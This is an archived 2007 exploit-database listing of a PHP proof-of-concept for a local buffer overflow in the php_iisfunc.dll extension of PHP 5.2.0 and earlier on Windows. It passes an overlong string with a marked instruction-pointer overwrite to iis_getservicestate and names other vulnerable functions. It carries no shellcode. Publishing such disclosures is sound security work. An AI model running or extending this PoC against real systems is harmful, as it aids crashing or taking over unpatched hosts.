Lucene search
K

php520-local.txt

🗓️ 27 Aug 2007 00:00:00Reported by boeckeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

php_iisfunc.dll PHP Buffer Overflow PoC, Local Buffer Overflow Ris

Code
`<?php  
// ==================================================================================  
//  
// php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC  
//  
// Discovery: boecke <[email protected]>  
// Risk: Local Buffer Overflow (Medium - High Risk)  
// Notes: Various other functions are exploitable, all of which convert the  
// string argument(s) to unicode.  
//  
// extern "C" IISFUNC_API int fnStartService(LPCTSTR ServiceId);  
// extern "C" IISFUNC_API int fnGetServiceState(LPCTSTR ServiceId);  
// extern "C" IISFUNC_API int fnStopService(LPCTSTR ServiceId);  
//  
// "Sangre, sonando, de rabia naci.. Who do you trust?"  
// - Cygnus, Vismund Cygnus: Sarcophagi  
//  
// ==================================================================================  
  
if ( !extension_loaded( "iisfunc" ) )  
{  
die( "Extension not loaded.\n" );  
}  
  
$buf_unicode = str_repeat( "A", 256 );  
$eip_unicode = "\x41\x41";  
  
iis_getservicestate( $buf_unicode . $eip_unicode );  
  
?>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation